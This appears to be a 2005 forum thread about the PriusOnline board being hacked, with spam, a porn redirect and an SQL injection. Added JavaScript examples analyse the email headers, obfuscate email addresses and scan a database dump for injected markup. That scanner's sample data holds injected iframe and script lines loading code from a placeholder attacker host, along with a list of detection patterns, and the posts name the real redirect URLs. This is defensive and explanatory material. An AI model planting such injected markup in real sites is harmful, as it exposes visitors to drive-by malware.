PriusOnline's home page has been hacked, it redirects now to some .tk site. Looks like it's also trying to download a worm, my firewall caught it. I also got this interesting email from "[email protected]":

The following is an email sent to you by an administrator of "PriusOnline.com". If this message is spam, contains abusive or other comments you find offensive please contact the webmaster of the board at the following address: [email protected] Include this full email (particularly the headers).

Message sent to you follows:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Visite our new website!!! www.e-corporation.tk
I did some more digging.... The hack redirects you to a forwarder: http://usuarios.lycos.es/mulesoftxxx/1.html It looks like it got into the SQL - there's been a virus out that attacks boards running MySQL - looks like it got PriusOnline. On my board, I've had to apply two vBulletin patches to protect it. Sure hope it hasn't trashed all the data in his DB.
Here are the email headers in case that's of any use. Presumably they got access to the list of email addresses of users. You should probably delete any email with the subject "We Have New Website!!!!!!" or anything from [email protected]

Received: from dynamocomputers.com ([69.64.32.45]) by sccrmxc13.comcast.net (sccrmxc13) with SMTP id <20050305225756s13008a4qpe>; Sat, 5 Mar 2005 22:57:56 +0000
X-Originating-IP: [69.64.32.45]
Received: (qmail 28191 invoked from network); 5 Mar 2005 22:53:36 -0000
Received: from gmga.net (HELO mail.priusonline.com) (69.64.32.45) by endwellumc.us with SMTP; 5 Mar 2005 22:53:31 -0000
Subject: We Have New Website!!!!!
To: [email protected]
Reply-to: [email protected]
From: [email protected]
Return-Path: [email protected]
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 8bit
Date: Sat, 5 Mar 2005 17:53:11 -0500
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: PHP
X-MimeOLE: Produced By phpBB2
X-AntiAbuse: Board servername - www.priusonline.com
X-AntiAbuse: User_id - 2
X-AntiAbuse: Username - jeff
X-AntiAbuse: User IP - 62.57.182.184
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on dynamocomputers.com
X-Spam-Level: *
X-Spam-Status: No, hits=1.1 required=5.0 tests=AWL,MISSING_OUTLOOK_NAME,
	NO_REAL_NAME,PLING_PLING autolearn=no version=2.63
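The header block quoted above can be read mechanically rather than by eye. What follows is an added example, not code from the thread or from phpBB: a small Node.js script that parses the quoted headers, walks the Received chain oldest-first, flags a HELO name that does not match the connecting host, and pulls out the X-AntiAbuse fields that phpBB2's mailer attaches to mail the board itself sends. The sample input is the header block above reflowed one field per line; the addresses were already redacted on the page and stay that way.

```javascript
// Constructed sample: the headers quoted in the post above, one field per line.
// Mailbox addresses were already redacted on the page and stay redacted here.
const RAW_HEADERS = [
  'Received: from dynamocomputers.com ([69.64.32.45]) by sccrmxc13.comcast.net (sccrmxc13) with SMTP id <20050305225756s13008a4qpe>; Sat, 5 Mar 2005 22:57:56 +0000',
  'X-Originating-IP: [69.64.32.45]',
  'Received: (qmail 28191 invoked from network); 5 Mar 2005 22:53:36 -0000',
  'Received: from gmga.net (HELO mail.priusonline.com) (69.64.32.45) by endwellumc.us with SMTP; 5 Mar 2005 22:53:31 -0000',
  'Subject: We Have New Website!!!!!',
  'From: [email protected]',
  'X-Mailer: PHP',
  'X-MimeOLE: Produced By phpBB2',
  'X-AntiAbuse: Board servername - www.priusonline.com',
  'X-AntiAbuse: User_id - 2',
  'X-AntiAbuse: Username - jeff',
  'X-AntiAbuse: User IP - 62.57.182.184',
].join('\n');

// Split a raw header block into {name, value} fields. A line starting with
// whitespace is a folded continuation of the previous field (RFC 5322 2.2.3).
function parseHeaders(raw) {
  const fields = [];
  for (const line of raw.split(/\r?\n/)) {
    if (/^[ \t]/.test(line) && fields.length) {
      fields[fields.length - 1].value += ' ' + line.trim();
      continue;
    }
    const m = line.match(/^([!-9;-~]+):\s*(.*)$/);
    if (m) fields.push({ name: m[1], value: m[2] });
  }
  return fields;
}

function header(fields, name) {
  const f = fields.find(x => x.name.toLowerCase() === name.toLowerCase());
  return f ? f.value : null;
}

// Each MTA prepends its own Received: line, so the topmost is the last hop.
// Reverse them to read the path origin-first, and pull out the parts worth
// checking: who connected, what it said in HELO, its IP, and who accepted.
function receivedChain(fields) {
  return fields
    .filter(f => f.name.toLowerCase() === 'received')
    .map(f => f.value)
    .reverse()
    .map(v => {
      const from = v.match(/^from\s+(\S+)/);
      const helo = v.match(/\(HELO\s+([^)\s]+)\)/i);
      const ip = v.match(/(\d{1,3}(?:\.\d{1,3}){3})/);
      const by = v.match(/\bby\s+(\S+)/);
      return {
        from: from ? from[1] : null,
        helo: helo ? helo[1] : null,
        ip: ip ? ip[1] : null,
        by: by ? by[1] : null,
        // The connecting host announcing itself under a different name is a
        // classic sign that the sender is not who the message claims.
        heloMismatch: !!(from && helo && from[1].toLowerCase() !== helo[1].toLowerCase()),
      };
    });
}

// phpBB2's mailer stamps board-sent mail with "X-AntiAbuse: <key> - <value>"
// lines naming the board account and client IP that triggered the send.
function antiAbuse(fields) {
  const out = {};
  for (const f of fields) {
    if (f.name.toLowerCase() !== 'x-antiabuse') continue;
    const m = f.value.match(/^(.*?)\s+-\s+(.*)$/);
    if (m) out[m[1]] = m[2];
  }
  return out;
}

function triage(raw) {
  const fields = parseHeaders(raw);
  return {
    hops: receivedChain(fields),
    antiAbuse: antiAbuse(fields),
    mailer: header(fields, 'X-Mailer'),
    sentByBoardSoftware: /phpBB/i.test(header(fields, 'X-MimeOLE') || ''),
  };
}

console.log(JSON.stringify(triage(RAW_HEADERS), null, 2));
```

On this sample the origin hop connects as gmga.net but announces itself in HELO as mail.priusonline.com, and the X-AntiAbuse fields say the message left through the board's own mail code under user_id 2 (username jeff) from client IP 62.57.182.184. That is the part of the headers worth preserving for the board admin: it points at the account and source address that drove the mass mailing, not just at the relay that delivered it.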
With two firewalls, one in the router and ZoneAlarm, and real time virus protection, I allowed the redirected site to load. It is a sexually explicit porn site. Just to be on the safe side, I am updating my virus definitions and running a scan.
If you've visited the redirected site you might want to delete the cookie it leaves behind and the .js, .gif, .jpg files from http://naonak.defacers.com.mx it leaves behind in your Temporary Internet Files directory. The cookie just contains:

phpbb2mysql_data a%3A0%3A%7B%7D www.priusonline.com/ 1024 3844875008 29769902 1826853808 29696477 *
I have my Internet Options set to delete the temp files when I close the browser. I looked for such a cookie, but found none. Thanks
Or you can just get a Mac and download your e-mail and visit your web sites with impunity.... I got the offending e-mail too and got redirected to the spanish porn site... bummer for PriusOnline.... I guess I'll be getting more spam soon.
I am on OS X on a Mac and I purged the cookies. Anything else to do? I reported the email as spam to Comcast. Should I call the Attorney General's Office for Washington State? We have a spam law. If I was still running OS 9 I would have no doubts, but I am still working through this UNIX OS X thing. Why would someone want to send a total Gringo like me to a foreign language site? I have no idea what was going on. I do English and can puzzle out German and that's it. One day I will learn enough Polish to decipher my genealogy. I hope Satan is holding a special circle in hell for these folks.
Dammit, if I got an email from them that means I'm going to get spam. I've had this email account safe from spam for 3 years. I visited the web site but was not redirected to a porn site. I guess the code doesn't work for Firefox. I'm behind a cheap Linksys router firewall so I'm sure I'm not protected. I don't run anti-virus either. I had it once. Then one day Norton started asking me to pay for it again. I was like!!!! No. Ok.... Uninstall. I already paid the 40 bucks for it once.... I don't want to keep paying that year after year. So. I probably have a virus. Whooo! I guess I'm one of those people on the AOL commercials that are just asking for viruses. Well, my computer is still running. It's not going slower. I have so much spyware on it already I don't even care anymore. I hate computers.
It does work for Firefox, I got the redirect...this is really bad, there are a lot of subscribers to POL and they clearly now have access to every e-mail address....
I checked my email on the server, did not download it to my PC. Sure enough, that spam email was there. While I deleted it off the roster of emails in my inbox, I expect to get hosed with spam now.
The other thing to be cautious about is if you use that password with anything else with that username or email address. We don't know at this time how hacked they were. If you do, you might want to change those passwords, just to be safe.
That's why for all these groups I use an e-mail addy that is already compromised and a different user/password than what I use for accounts that need more safety (like banks). The information is too easily hacked these days *sigh*. I use SafeID and RoboForm to keep track of all the usernames/passwords. Otherwise I'd be lost. By the By, I haven't noticed my Firefox doing anything weird after I went to Prius Online during the hack period. There seem to be no cookies. The e-mail was not flagged by my virus software. I think they were nasty but not evil. Lisa
This is why you should always keep public and private e-mails separate; never publicly list addresses you don't want spammed. Also, your e-mails were already known to the spammers long before PriusOnline got hacked -- e-mail "spiders" crawl the web just like Google does, except they search for e-mail addresses and add them to a database so later mass e-mails can be sent to every address that's found. I run a website, and I encode all e-mail addresses, and decode them client-side using JavaScript. It looks perfectly normal for users, but since e-mail spiders never run JavaScript, they never see the actual e-mail addresses.
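The encode-on-the-server, decode-in-the-browser approach described above, as an added example (not the poster's own code): the server XORs the address with a per-page key and writes only hex into the anchor, and a few lines of client-side JavaScript turn that back into a working mailto: link after the page loads. The address, key and markup are constructed for the demo. Both halves are in one Node.js file so the round trip can be checked here; in a real page only `decodeAddress` and `hydrate` ship to the browser.

```javascript
// Added example. Address and key are constructed for the demo; use a fresh key per page render.
const SAMPLE_ADDRESS = 'webmaster@example.com';
const PAGE_KEY = 0x5a;

// Server side: XOR each character code with the key and emit hex, so the markup holds
// nothing that matches the  something@host.tld  pattern harvesters grep for.
// Restricted to Latin-1 addresses because the decoder rebuilds one byte per character.
function encodeAddress(addr, key) {
  if (/[^\x00-\xff]/.test(addr)) throw new Error('Latin-1 addresses only');
  return Array.from(addr, ch => (ch.charCodeAt(0) ^ key).toString(16).padStart(2, '0')).join('');
}

// Client side: the inverse. Validates the payload first so a tampered attribute fails loudly.
function decodeAddress(hex, key) {
  if (!/^(?:[0-9a-f]{2})+$/i.test(hex)) throw new Error('malformed encoded address');
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16) ^ key);
  }
  return out;
}

// Server side: the anchor as written into the HTML. No mailto:, no address, just the payload
// and the key. The visible label is escaped like any other user-facing text.
function renderLink(addr, key, label) {
  const esc = s => s.replace(/[&<>"]/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' }[c]));
  return `<a href="#" class="em" data-e="${encodeAddress(addr, key)}" data-k="${key}">${esc(label)}</a>`;
}

// Client side: fill in href and text for every decorated anchor. Takes the node list as an
// argument so it can be exercised with plain objects here; in a page run it after load as
//   hydrate(document.querySelectorAll('a.em[data-e]'))
function hydrate(anchors) {
  let count = 0;
  for (const a of anchors) {
    const addr = decodeAddress(a.dataset.e, parseInt(a.dataset.k, 10));
    a.href = 'mailto:' + addr;
    a.textContent = addr;
    count++;
  }
  return count;
}

// Demo: what the server emits, then what the browser turns it into.
const markup = renderLink(SAMPLE_ADDRESS, PAGE_KEY, 'Contact the webmaster');
const fakeAnchor = { dataset: { e: encodeAddress(SAMPLE_ADDRESS, PAGE_KEY), k: String(PAGE_KEY) }, href: '#', textContent: '' };
hydrate([fakeAnchor]);
console.log(markup);
console.log(fakeAnchor.href);
```

Two caveats a practitioner should keep in mind. A crawler driving a real browser engine does execute JavaScript and will see the decoded address in the DOM, so this raises the cost of harvesting rather than ruling it out. And it only protects addresses on rendered pages; it does nothing for addresses sitting in a board's database, which is where PriusOnline's members' addresses were taken from.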
Yep, they got to the site with the MySQL SQL Injection bug - so they got access to the whole thing, including the DB. Their admin posted this:

As anybody who visited the site in the last couple of hours noticed, PriusOnline was once again hacked. This time the attacker was able to inject code directly into the database. I have removed the iframe link but I have no idea what else was done. I will be investigating further and will post an announcement if fixing it will require any further downtime.
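The admin's "I have removed the iframe link but I have no idea what else was done" is the usual position after a write into the database: one injected row was found because it was visible, and nothing says it was the only one. An added example, not from the thread or from phpBB, of the first check I would run: take a `mysqldump` of the board and scan every field of every INSERT for markup that has no business in a phpBB2 table, reporting table, row and field position so the live rows can be inspected. The dump below is constructed (mysqldump's default one-INSERT-per-table layout, no column list); attacker.example is a placeholder, not the host named in the thread.

```javascript
// Constructed sample in mysqldump's default layout (one INSERT per table, no column list).
// Two rows carry injected markup of the kind the admin describes; the rest are clean.
// attacker.example is a placeholder, not the host named in the thread.
const SAMPLE_DUMP = `
INSERT INTO phpbb_config VALUES ('sitename','PriusOnline'),('site_desc','Prius owners forum<iframe src="http://attacker.example/1.html" width=0 height=0></iframe>'),('board_email_sig','Thanks, The Management');
INSERT INTO phpbb_posts_text VALUES (1,'','Welcome to the board, it\\'s good to see you.'),(2,'9f3c','[b:9f3c]Hello[/b:9f3c] everyone');
INSERT INTO phpbb_users VALUES (2,1,'jeff','<script>document.write(unescape("%3Cscript src=http://attacker.example/x.js%3E"))</script>'),(3,0,'alice','just a driver');
`;

// Things that have no business in a phpBB2 table under default settings, where posts,
// signatures and config strings are stored HTML-escaped or as BBCode.
const INDICATORS = [
  /<iframe\b/i, /<script\b/i, /<object\b/i, /<embed\b/i,
  /javascript\s*:/i, /document\.write/i, /\beval\s*\(/i,
  /\bon(?:load|error|mouseover)\s*=/i, /expression\s*\(/i,
];

// Split the text after VALUES into rows of fields, honouring quoted strings with
// backslash escapes and doubled quotes, so a comma inside injected markup does not
// split a field. Escapes like \n are reduced to the bare letter, which is enough for grepping.
function parseValues(text) {
  const rows = [];
  const n = text.length;
  let i = 0;
  while (i < n) {
    while (i < n && text[i] !== '(') i++;   // skip to the next tuple, past the ',' separators
    if (i >= n) break;
    i++;
    const row = [];
    let field = '';
    let quote = null;
    for (; i < n; i++) {
      const c = text[i];
      if (quote) {
        if (c === '\\' && i + 1 < n) { field += text[++i]; continue; }
        if (c === quote) {
          if (text[i + 1] === quote) { field += c; i++; continue; }
          quote = null;
          continue;
        }
        field += c;
      } else if (c === "'" || c === '"') {
        quote = c;
      } else if (c === ',') {
        row.push(field); field = '';
      } else if (c === ')') {
        row.push(field); i++; break;
      } else if (!/\s/.test(c)) {
        field += c;                            // unquoted literal: numbers, NULL
      }
    }
    rows.push(row);
  }
  return rows;
}

// Walk every INSERT in the dump and report each field that trips an indicator,
// with enough context (table, row, field position) to find it in the live database.
function scanDump(dump) {
  const findings = [];
  const stmt = /INSERT\s+INTO\s+`?(\w+)`?\s+VALUES\s*([\s\S]*?);[ \t]*$/gim;
  let m;
  while ((m = stmt.exec(dump)) !== null) {
    const [, table, body] = m;
    parseValues(body).forEach((row, r) => {
      row.forEach((field, f) => {
        const hit = INDICATORS.find(re => re.test(field));
        if (hit) findings.push({ table, row: r, field: f, indicator: hit.source, snippet: field.slice(0, 80) });
      });
    });
  }
  return findings;
}

for (const hit of scanDump(SAMPLE_DUMP)) {
  console.log(`${hit.table} row ${hit.row} field ${hit.field}: ${hit.indicator} -> ${hit.snippet}`);
}
```

Run against the real dump this turns up the site_desc iframe the admin already found and anything of the same kind in signatures, posts, announcements or template-related config that nobody has looked at yet. It is a grep, not a proof of cleanliness: an attacker with database write access can also have added or promoted accounts (compare the board's admin-level users against the known list) or changed the board's email and URL settings, none of which contain markup, so those tables need a manual read as well. The safest outcome of this exercise is a restore from a backup taken before the injection, with the SQL injection patched first.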